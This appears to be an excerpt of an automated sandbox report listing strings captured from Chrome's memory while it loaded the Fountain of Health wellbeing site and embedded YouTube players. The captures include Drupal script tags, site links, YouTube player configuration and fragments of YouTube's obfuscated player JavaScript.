                                  Source: chrome.exe, 00000000.00000003.2385420147.000028EC07EBC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: \"/core/misc/states.js?v=10.1.0\"></script>\n<script src=\"/themes/bootstrap/js/misc/states.js?swjs7b\"></script>\n<script src=\"/modules/webform/js/webform.states.js?v=10.1.0\"></script>\n<script src=\"/modules/webform/modules/webform_bootstrap/js/webform_bootstrap.states.js?v=10.1.0\"></script>\n<script src=\"/themes/bootstrap/js/popover.js?swjs7b\"></script>\n<script src=\"/themes/bootstrap/js/tooltip.js?swjs7b\"></script>\n<script src=\"/core/misc/displace.js?v=10.1.0\"></script>\n<script src=\"/core/misc/jquery.tabbable.shim.js?v=10.1.0\"></script>\n<script src=\"/core/misc/position.js?v=10.1.0\"></script>\n<script src=\"/themes/bootstrap/js/modal.js?swjs7b\"></script>\n<script src=\"/themes/bootstrap/js/dialog.js?swjs7b\"></script>\n<script src=\"/themes/bootstrap/js/modal.jquery.ui.bridge.js?swjs7b\"></script>\n<script src=\"/core/misc/dialog/dialog.js?v=10.1.0\"></script>\n<script src=\"/core/misc/dialog/dialog.position.js?v=10.1.0\"></script>\n<script src=\"/core/modules/ckeditor5/js/ckeditor5.dialog.fix.js?v=10.1.0\"></script>\n<script src=\"/core/misc/dialog/dialog.ajax.js?v=10.1.0\"></script>\n<script src=\"/themes/bootstrap/js/misc/dialog.ajax.js?swjs7b\"></script>\n<script src=\"/libraries/json2/json2.js?v=2\"></script>\n<script src=\"/libraries/jquery.cycle/jquery.cycle.all.js?v=3.0.3\"></script>\n<script src=\"/modules/views_slideshow/modules/views_slideshow_cycle/js/views_slideshow_cycle.js?swjs7b\"></script>\n<script src=\"/modules/views_slideshow/js/views_slideshow.js?v=10.1.0\"></script>\n\n \n\n<div id=\"drupal-live-announce\" class=\"visually-hidden\" aria-live=\"polite\" aria-busy=\"false\"></div><div id=\"drupal-modal\" class=\"ui-front\" style=\"display: 
none;\"></div></body>","favicon":"https://fountainofhealth.ca/sites/default/files/FOH%20-%20Favicon.png","currentUrl":"https://fountainofhealth.ca/en","listArrString":["https://fountainofhealth.ca/en/thrive-c-approach-wellbeing","https://wellnessapp.ca/app/login","https://fountainofhealth.ca/en/thrive/resources","https://www.mentalhealthns.ca/fountain-of-health","https://fountainofhealth.ca/en/about-us","https://fountainofhealth.ca/","https://fountainofhealth.ca/about-us#about-foh-learning-center","https://fountainofhealth.ca/en/form/contact-us","https://twitter.com/FoHTHRIVE","https://www.facebook.com/FOHThrive","https://fountainofhealth.ca/en/home","https://www.youtube.com/@fountainofhealth2679","https://fountainofhealth.ca/fr/node/113","https://fountainofhealth.ca/en#main-content","https://fountainofhealth.ca/organizations","https://fountainofhealth.ca/individuals","https://fountainofhealth.ca/clinicians","https://fountainofhealth.ca/our-people-partners#world","https://fountainofhealth.ca/our-people-partners#teams",null,"https://fountainofhealth.ca/thrive/thoughts","https://fountainofhealth.ca/thrive/health-habits","https://fountainofhealth.ca/thrive/relationship","https://fountainofhealth.ca/thrive/interests","https://fountainofhealth.ca/thrive/valued-goals","https:/
                                  Source: chrome.exe, 00000000.00000003.2344000946.000028EC04BB2000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2343716935.000028EC04BCE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerConfig\\\":{\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerFlags\\\":{}},\\\"embeddedPlayerContext\\\":{\\\"embeddedPlayerEncryptedContext\\\":\\\"AD5ZzFS_WffsIbEul0CEhgLEMVRDFSsvbzVZoVlGlHnyh7Zsd5DVg6hhlnoUALqsJHS2nzTvLcTJ-e9WEo2RWgTQYeAfghp_xaX95uRDC3BC66dgByAzcif3vsFK7XdBfEcf\\\",\\\"ancestorOriginsSupported\\\":false}}\",\"video_id\":\"FURi5aHgp1g\"},\"POST_MESSAGE_ORIGIN\":\"*\",\"VIDEO_ID\":\"FURi5aHgp1g\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2343716935.000028EC04BCE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerConfig\\\":{\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerFlags\\\":{}},\\\"embeddedPlayerContext\\\":{\\\"embeddedPlayerEncryptedContext\\\":\\\"AD5ZzFS_WffsIbEul0CEhgLEMVRDFSsvbzVZoVlGlHnyh7Zsd5DVg6hhlnoUALqsJHS2nzTvLcTJ-e9WEo2RWgTQYeAfghp_xaX95uRDC3BC66dgByAzcif3vsFK7XdBfEcf\\\",\\\"ancestorOriginsSupported\\\":false}}\",\"video_id\":\"FURi5aHgp1g\"},\"POST_MESSAGE_ORIGIN\":\"*\",\"VIDEO_ID\":\"FURi5aHgp1g\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false}= [];","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2323398475.000028EC04C3A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerConfig\\\":{\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerFlags\\\":{}},\\\"embeddedPlayerContext\\\":{\\\"embeddedPlayerEncryptedContext\\\":\\\"AD5ZzFS_WffsIbEul0CEhgLEMVRDFSsvbzVZoVlGlHnyh7Zsd5DVg6hhlnoUALqsJHS2nzTvLcTJ-e9WEo2RWgTQYeAfghp_xaX95uRDC3BC66dgByAzcif3vsFK7XdBfEcf\\\",\\\"ancestorOriginsSupported\\\":false}}\",\"video_id\":\"FURi5aHgp1g\"},\"POST_MESSAGE_ORIGIN\":\"*\",\"VIDEO_ID\":\"FURi5aHgp1g\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":true} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2356104978.000028EC04C5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \"INNERTUBE_API_VERSION\":\"v1\",\"INNERTUBE_CLIENT_NAME\":\"WEB_EMBEDDED_PLAYER\",\"INNERTUBE_CLIENT_VERSION\":\"1.20250519.22.00\",\"INNERTUBE_CONTEXT\":{\"client\":{\"hl\":\"en\",\"gl\":\"US\",\"remoteHost\":\"191.101.61.23\",\"deviceMake\":\"\",\"deviceModel\":\"\",\"visitorData\":\"CgtZeUJvRVhYZXBCMCj2-rzBBjIKCgJVUxIEGgAgUA%3D%3D\",\"userAgent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36,gzip(gfe)\",\"clientName\":\"WEB_EMBEDDED_PLAYER\",\"clientVersion\":\"1.20250519.22.00\",\"osName\":\"Windows\",\"osVersion\":\"10.0\",\"originalUrl\":\"https://www.youtube.com/embed/gobWGqPjLSQ?si\\u003dE-htCYBt9m3YW0ws\",\"platform\":\"DESKTOP\",\"clientFormFactor\":\"UNKNOWN_FORM_FACTOR\",\"configInfo\":{\"appInstallData\":\"CPb6vMEGELnZzhwQ7aDPHBC9mbAFEN68zhwQ66DPHBDmoM8cEIiHsAUQpp3PHBCJsM4cEOvo_hIQr4__EhDk5_8SENyizxwQ9quwBRDdls8cEJmYsQUQ37jOHBDxnLAFEP2czxwQvoqwBRCHrM4cEIjjrwUQ4Z7PHBD-ns8cEODg_xIQiIS4IhCThs8cEIHNzhwQ2oeAExCa9M4cEJybzxwQmY2xBRCe0LAFEPyyzhwQvbauBRCLgoATEMzfrgUQ0-GvBRD-8_8SELvZzhwQyeawBRDqo88cEMyJzxwQt-r-EhCwic8cEIOEuCIQ9v7_EhCU_rAFENeczxwQuOTOHBDw4s4cEMn3rwUqKENBTVNHQlVULVpxLURKU0NFdmVwMlF2bW9RajU3QVBKM0FVZEJ3PT0%3D\"},\"browserName\":\"Chrome\",\"browserVersion\":\"134.0.0.0\",\"acceptHeader\":\"text/html,application/xhtml+xml,application/xml;q\\u003d0.9,image/avif,image/webp,image/apng,*/*;q\\u003d0.8,application/signed-exchange;v\\u003db3;q\\u003d0.7\",\"deviceExperimentId\":\"ChxOelV3TnpJNE5qWTRNakEwTnpNd05UVTVOZz09EPb6vMEGGPb6vMEG\",\"rolloutToken\":\"CLLHipfu3syhbhCrlubnrLeNAxiC1vOcrbeNAw%3D%3D\"},\"user\":{\"lockedSafetyMode\":false},\"request\":{\"useSsl\":true},\"clickTracking\":{\"clickTrackingParams\":\"IhMIx8HznK23jQMV42xMCB1cST25\"},\"thirdParty\":{\"embeddedPlayerContext\":{\"embeddedPlayerEncryptedConte
xt\":\"AD5ZzFRO_8nQGG9ORNDSzmkPn-Uo_VeiVfjiwPlQ8ibCpbKGSMTxwT1uceJbejPXkPtxSS6fZPYoJMw_71fzot0Mx1OJrOf2f68RDWLaooVr3MmGoIQB53hXn4k_0fSZd_Yd\",\"ancestorOriginsSupported\":false}}},\"INNERTUBE_CONTEXT_CLIENT_NAME\":56,\"INNERTUBE_CONTEXT_CLIENT_VERSION\":\"1.20250519.22.00\",\"INNERTUBE_CONTEXT_GL\":\"US\",\"INNERTUBE_CONTEXT_HL\":\"en\",\"LATEST_ECATCHER_SERVICE_TRACKING_PARAMS\":{\"client.name\":\"WEB_EMBEDDED_PLAYER\"},\"LOGGED_IN\":false,\"PAGE_BUILD_LABEL\":\"youtube.player.web_20250519_22_RC00\",\"PAGE_CL\":760609635,\"SERVER_NAME\":\"WebFE\",\"VISITOR_DATA\":\"CgtZeUJvRVhYZXBCMCj2-rzBBjIKCgJVUxIEGgAgUA%3D%3D\",\"WEB_PLAYER_CONTEXT_CONFIGS\":{\"WEB_PLAYER_CONTEXT_CONFIG_ID_EMBEDDED_PLAYER\":{\"rootElementId\":\"movie_player\",\"jsUrl\":\"/s/player/59b252b9/player_ias.vflset/en_US/base.js\",\"cssUrl\":\"/s/player/59b252b9/www-player.css\",\"contextId\":\"WEB_PLAYER_CONTEXT_CONFIG_ID_EMBEDDED_PLAYER\",\"eventLabel\":\"embedded\",\"contentRegion\":\"US\",\"hl\":\"en_US\",\"hostLanguage\":\"en\",\"innertubeApiKey\":\"AIzaSyAO_FJ2SlqU8Q4STEHLGCilw_Y9_11qcW8\",\"innertubeApiVersion\":\"v1\",\"innertubeContextClientVersion\":\"1.20250519.22.00\",\"device\":{
                                  Source: chrome.exe, 00000000.00000002.2497331456.000028EC04C5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \"INNERTUBE_API_VERSION\":\"v1\",\"INNERTUBE_CLIENT_NAME\":\"WEB_EMBEDDED_PLAYER\",\"INNERTUBE_CLIENT_VERSION\":\"1.20250519.22.00\",\"INNERTUBE_CONTEXT\":{\"client\":{\"hl\":\"en\",\"gl\":\"US\",\"remoteHost\":\"191.101.61.23\",\"deviceMake\":\"\",\"deviceModel\":\"\",\"visitorData\":\"CgtZeUJvRVhYZXBCMCj2-rzBBjIKCgJVUxIEGgAgUA%3D%3D\",\"userAgent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36,gzip(gfe)\",\"clientName\":\"WEB_EMBEDDED_PLAYER\",\"clientVersion\":\"1.20250519.22.00\",\"osName\":\"Windows\",\"osVersion\":\"10.0\",\"originalUrl\":\"https://www.youtube.com/embed/h15NcT6UXh0?si\\u003dYrXkudamh5IoggTR\",\"platform\":\"DESKTOP\",\"clientFormFactor\":\"UNKNOWN_FORM_FACTOR\",\"configInfo\":{\"appInstallData\":\"CPb6vMEGEODg_xIQgc3OHBCIhLgiEIeszhwQ2oeAExDM364FEOugzxwQvoqwBRCvj_8SEN68zhwQ3ZbPHBD8ss4cEP7z_xIQpp3PHBDT4a8FEIjjrwUQ3KLPHBDhns8cEP2czxwQ5qDPHBDMic8cEL2ZsAUQ37jOHBC52c4cEParsAUQvbauBRCZjbEFEO2gzxwQ8OLOHBDJ968FEOvo_hIQmZixBRCcm88cEPGcsAUQyeawBRC72c4cEJr0zhwQsInPHBDXnM8cEOqjzxwQuOTOHBCe0LAFEIOEuCIQ9v7_EhCJsM4cEP6ezxwQk4bPHBDk5_8SELfq_hIQiIewBRCLgoATEJT-sAUqKENBTVNHQlVULVpxLURKU0NFdmVwMlF2bW9RajU3QVBKM0FVZEJ3PT0%3D\"},\"browserName\":\"Chrome\",\"browserVersion\":\"134.0.0.0\",\"acceptHeader\":\"text/html,application/xhtml+xml,application/xml;q\\u003d0.9,image/avif,image/webp,image/apng,*/*;q\\u003d0.8,application/signed-exchange;v\\u003db3;q\\u003d0.7\",\"deviceExperimentId\":\"ChxOelV3TnpJNE5qWTRNVFF6TkRNMk9ESTVOUT09EPb6vMEGGPb6vMEG\",\"rolloutToken\":\"CLLHipfu3syhbhCrlubnrLeNAxi57PGcrbeNAw%3D%3D\"},\"user\":{\"lockedSafetyMode\":false},\"request\":{\"useSsl\":true},\"clickTracking\":{\"clickTrackingParams\":\"IhMI9d/xnK23jQMVIU5MCB1T1y6N\"},\"thirdParty\":{\"embeddedPlayerContext\":{\"embeddedPlayerEncryptedConte
xt\":\"AD5ZzFTPLYxSer_R5PwkmZS-Tw4kib1_UG_YuM7PzprIn7h7HloFiT40fhwHmvTcbDZ5mAmX_gi3mQS0IvX9cIfuaL02Wqj7eTV8PMLoUpzaX-xPKwhnTeP7PCHG7qXu9THt\",\"ancestorOriginsSupported\":false}}},\"INNERTUBE_CONTEXT_CLIENT_NAME\":56,\"INNERTUBE_CONTEXT_CLIENT_VERSION\":\"1.20250519.22.00\",\"INNERTUBE_CONTEXT_GL\":\"US\",\"INNERTUBE_CONTEXT_HL\":\"en\",\"LATEST_ECATCHER_SERVICE_TRACKING_PARAMS\":{\"client.name\":\"WEB_EMBEDDED_PLAYER\"},\"LOGGED_IN\":false,\"PAGE_BUILD_LABEL\":\"youtube.player.web_20250519_22_RC00\",\"PAGE_CL\":760609635,\"SERVER_NAME\":\"WebFE\",\"VISITOR_DATA\":\"CgtZeUJvRVhYZXBCMCj2-rzBBjIKCgJVUxIEGgAgUA%3D%3D\",\"WEB_PLAYER_CONTEXT_CONFIGS\":{\"WEB_PLAYER_CONTEXT_CONFIG_ID_EMBEDDED_PLAYER\":{\"rootElementId\":\"movie_player\",\"jsUrl\":\"/s/player/59b252b9/player_ias.vflset/en_US/base.js\",\"cssUrl\":\"/s/player/59b252b9/www-player.css\",\"contextId\":\"WEB_PLAYER_CONTEXT_CONFIG_ID_EMBEDDED_PLAYER\",\"eventLabel\":\"embedded\",\"contentRegion\":\"US\",\"hl\":\"en_US\",\"hostLanguage\":\"en\",\"innertubeApiKey\":\"AIzaSyAO_FJ2SlqU8Q4STEHLGCilw_Y9_11qcW8\",\"innertubeApiVersion\":\"v1\",\"innertubeContextClientVersion\":\"1.20250519.22.00\",\"device\":{
                                  Source: chrome.exe, 00000000.00000003.2343716935.000028EC04BEA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerFlags\\\":{}},\\\"embeddedPlayerContext\\\":{\\\"embeddedPlayerEncryptedContext\\\":\\\"AD5ZzFS_WffsIbEul0CEhgLEMVRDFSsvbzVZoVlGlHnyh7Zsd5DVg6hhlnoUALqsJHS2nzTvLcTJ-e9WEo2RWgTQYeAfghp_xaX95uRDC3BC66dgByAzcif3vsFK7XdBfEcf\\\",\\\"ancestorOriginsSupported\\\":false}}\",\"video_id\":\"FURi5aHgp1g\"},\"POST_MESSAGE_ORIGIN\":\"*\",\"VIDEO_ID\":\"FURi5aHgp1g\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2323618407.000028EC04BB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerFlags\\\":{}},\\\"embeddedPlayerContext\\\":{\\\"embeddedPlayerEncryptedContext\\\":\\\"AD5ZzFS_WffsIbEul0CEhgLEMVRDFSsvbzVZoVlGlHnyh7Zsd5DVg6hhlnoUALqsJHS2nzTvLcTJ-e9WEo2RWgTQYeAfghp_xaX95uRDC3BC66dgByAzcif3vsFK7XdBfEcf\\\",\\\"ancestorOriginsSupported\\\":false}}\",\"video_id\":\"FURi5aHgp1g\"},\"POST_MESSAGE_ORIGIN\":\"*\",\"VIDEO_ID\":\"FURi5aHgp1g\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":true} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2439355514.000001E4ACC00000.00000004.00000001.00040000.00000007.sdmpString found in binary or memory: ]Uchrome-extension://gdaefkejpgkiemlaofpalmlakkmbjdnl/scripts/extension/backgroundV3.jschrome-extension://gdaefkejpgkiemlaofpalmlakkmbjdnl/scripts/extension/backgroundV3.jsurrentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false}=(G=+(I=T%16+1,r()|0)*I-I*l- -5880*l+Z[w+11&7]*T*I- -3960*T*l+w+60*l*l+2*T*T*I-120*T*T*l,void 0),Z)[G],Z[(t=w+A,(t|0)-~(t&7)+~t)+(g&2)]=L,Z)[w+(2*(g|0)-(g|2)-(g^2)+2*(~g&2))]=-66,L},q=C),q} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2501993718.000028EC06D4C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ]Uhttps://www.youtube.com/s/player/59b252b9/www-embed-player.vflset/www-embed-player.js equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2352502411.000028EC04CA9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2393454896.000028EC04CE1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: _ = [];","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2323240565.000028EC04C71000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: _ = [];","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":true} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2486385269.000028EC03974000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: _keyhttps://www.youtube.com/s/player/59b252b9/player_ias.vflset/en_US/base.js equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2492640929.000028EC04120000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: _keyhttps://www.youtube.com/s/player/59b252b9/player_ias.vflset/en_US/embed.js equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2315986851.000028EC0102A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: _keyhttps://www.youtube.com/s/player/59b252b9/player_ias.vflset/en_US/embed.js equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2492640929.000028EC04120000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: _keyhttps://www.youtube.com/s/player/59b252b9/player_ias.vflset/en_US/remote.js equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2496640859.000028EC04998000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: _keyhttps://www.youtube.com/s/player/59b252b9/www-embed-player.vflset/www-embed-player.js equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2369861259.000028EC068F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2349100192.000028EC06404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2494505049.000028EC0458C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: access-control-allow-origin:https://www.youtube.com equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2469369795.000028EC023C4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2487549813.000028EC03B90000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2504142825.000028EC07868000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https_www.youtube.com_0@1 equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2492215314.000028EC040DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: if ('undefined' == typeof Symbol || 'undefined' == typeof Symbol.iterator) {delete Array.prototype.entries;}","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2492215314.000028EC040DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: if ('undefined' == typeof Symbol || 'undefined' == typeof Symbol.iterator) {delete Array.prototype.entries;}","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":false}EB equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2313814600.000028EC04404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313605417.000028EC03ABE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: if(!(f||g||h||m.length||n.length))return;var q={Yi:f,Wi:g,Xi:h,Gj:m,Hj:n,Pf:p,bc:e},r=l.YT;if(r)return r.ready&&r.ready(d),e;var t=l.onYouTubeIframeAPIReady;l.onYouTubeIframeAPIReady=function(){t&&t();d()};A(function(){for(var u=y.getElementsByTagName("script"),v=u.length,w=0;w<v;w++){var x=u[w].getAttribute("src");if(RI(x,"iframe_api")||RI(x,"player_api"))return e}for(var z=y.getElementsByTagName("iframe"),C=z.length,D=0;D<C;D++)if(!II&&PI(z[D],q.Pf))return vc("https://www.youtube.com/iframe_api"), equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2352192649.000028EC04A69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: iginsSupported\\\":false}}\",\"video_id\":\"h15NcT6UXh0\"},\"POST_MESSAGE_ORIGIN\":\"*\",\"VIDEO_ID\":\"h15NcT6UXh0\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2340949325.000028EC067D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: is.o+1>>1,1),this,498,244),U(k(this[wq].length,1),this,498),f=this.v6?a(86,this):M(126,this),f.length>0&&U(k(f.length,2).concat(f),this,141,227),D=M(141,this),D.length>4&&U(k(D.length,2).concat(D),this,498,226),v=0,v-=(Q=M(498,this).length,-2*~(Q&5)+-4-(Q|-6)-(~Q|5)),v+=a(369,this)&2047,L=E(this,437),L.length>4&&(v-=(VL=L.length,-2-~VL- -4)),v>0&&U(k(v,2).concat(RB(v)),this,498,150),x=12;else if(x==71)R=4,h(),x=74;else if(x==17)r++,x=18;else if(x==98)qv[b++]=X&255,X>>=8,x=11;else if(x==83)H=\"$\"+H,x=33;else if(x==23)x=64;else if(x==70)r5!==undefined?(x=r5,r5=undefined):x=8;else if(x==40)R=6,aB(255,this,Na,17),r5=8,x=62;else if(x==53)x=L.length>1E6?82:52;else if(x==68)x=r5!==undefined?62:87;else if(x==74)gq=w.next(),x=64;else if(x==51)c=T[r][this.FA](16),c.length==1&&(c=\"0\"+c),H+=c,x=17;else if(x==91)W++,x=94;else if(x==11)qv[b++]=X,x=91;else if(x==87)R=6,T=RB(2).concat(a(498,this)),T[1]=(sn=T[0],159-(sn&159)+(sn&-160)),T[3]=(Y=T[1],AJ=d[0],(Y|0)+(AJ|0)-2*(Y&AJ)),T[4]=(Tq=T[1],N=d[1],2*(~Tq&N)+(Tq|~N)-(~Tq|N)),H=this.xu(T),x=43;else if(x==64)x=gq.done?84:47;else if(x==78)this.Mg=qv,this.X=this.Mg.length<<3,p(294,this,[0,0,0]),x=90;else if(x==61)x=Z==dq?22:62;else if(x==82)L=L.slice(0,1E6),U([],this,498,102),Ma(7,498,this,[],135),x=52;else if(x==21)R=3,l=atob(C),W=0,qv=[],b=0,x=9;else if(x==9)x=94;else if(x==89)throw Q2;}}}catch(qa){if(R==(Q2=qa,19))throw qa;R==4?(Cb=qa,x=19):R==3?(Na=qa,x=40):R==6?(r5=89,x=62):R==99&&(r5=89,x=60)}}}(),S).xu=function(m,A,g,T,Z){return tq.call(this,77,32,m,A,g,T,Z)},S.jr=function(){return tq.call(this,77,12)},S).h0=0;var F_,KY=/./,Lb=Jq.pop.bind((u.prototype[oB]=[(S.Ef=(S.bS=0,function(){return n.call(this,34)}),0),0,1,1,0,1,1],u.prototype[CY])),zX=((F_=(KY[u.prototype.FA]=Lb,WC(\":\",5,{get:Lb},u.prototype.l)),u).prototype.NV=void 
0,function(m,A){return(A=pY(78,55,22,94,null,\"error\",\"ad\"))&&m.eval(A.createScript(\"1\"))===1?function(g){return A.createScript(g)}:function(g){return\"\"+g}}(P));((cC=P.trayride||(P.trayride={}),cC.m>40)||(cC.m=41,cC.ad=sa,cC.a=Rj),cC).zfk_=function(m,A,g,T,Z,c,r,l){return[(l=new u(Z,r,A,c,m,T),function(w){return tq(77,5,false,l,w)}),function(w){l.Ef(w)}]};}).call(this);'].join('\\n')));}).call(this);","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":true} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2340949325.000028EC067D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: is.o+1>>1,1),this,498,244),U(k(this[wq].length,1),this,498),f=this.v6?a(86,this):M(126,this),f.length>0&&U(k(f.length,2).concat(f),this,141,227),D=M(141,this),D.length>4&&U(k(D.length,2).concat(D),this,498,226),v=0,v-=(Q=M(498,this).length,-2*~(Q&5)+-4-(Q|-6)-(~Q|5)),v+=a(369,this)&2047,L=E(this,437),L.length>4&&(v-=(VL=L.length,-2-~VL- -4)),v>0&&U(k(v,2).concat(RB(v)),this,498,150),x=12;else if(x==71)R=4,h(),x=74;else if(x==17)r++,x=18;else if(x==98)qv[b++]=X&255,X>>=8,x=11;else if(x==83)H=\"$\"+H,x=33;else if(x==23)x=64;else if(x==70)r5!==undefined?(x=r5,r5=undefined):x=8;else if(x==40)R=6,aB(255,this,Na,17),r5=8,x=62;else if(x==53)x=L.length>1E6?82:52;else if(x==68)x=r5!==undefined?62:87;else if(x==74)gq=w.next(),x=64;else if(x==51)c=T[r][this.FA](16),c.length==1&&(c=\"0\"+c),H+=c,x=17;else if(x==91)W++,x=94;else if(x==11)qv[b++]=X,x=91;else if(x==87)R=6,T=RB(2).concat(a(498,this)),T[1]=(sn=T[0],159-(sn&159)+(sn&-160)),T[3]=(Y=T[1],AJ=d[0],(Y|0)+(AJ|0)-2*(Y&AJ)),T[4]=(Tq=T[1],N=d[1],2*(~Tq&N)+(Tq|~N)-(~Tq|N)),H=this.xu(T),x=43;else if(x==64)x=gq.done?84:47;else if(x==78)this.Mg=qv,this.X=this.Mg.length<<3,p(294,this,[0,0,0]),x=90;else if(x==61)x=Z==dq?22:62;else if(x==82)L=L.slice(0,1E6),U([],this,498,102),Ma(7,498,this,[],135),x=52;else if(x==21)R=3,l=atob(C),W=0,qv=[],b=0,x=9;else if(x==9)x=94;else if(x==89)throw Q2;}}}catch(qa){if(R==(Q2=qa,19))throw qa;R==4?(Cb=qa,x=19):R==3?(Na=qa,x=40):R==6?(r5=89,x=62):R==99&&(r5=89,x=60)}}}(),S).xu=function(m,A,g,T,Z){return tq.call(this,77,32,m,A,g,T,Z)},S.jr=function(){return tq.call(this,77,12)},S).h0=0;var F_,KY=/./,Lb=Jq.pop.bind((u.prototype[oB]=[(S.Ef=(S.bS=0,function(){return 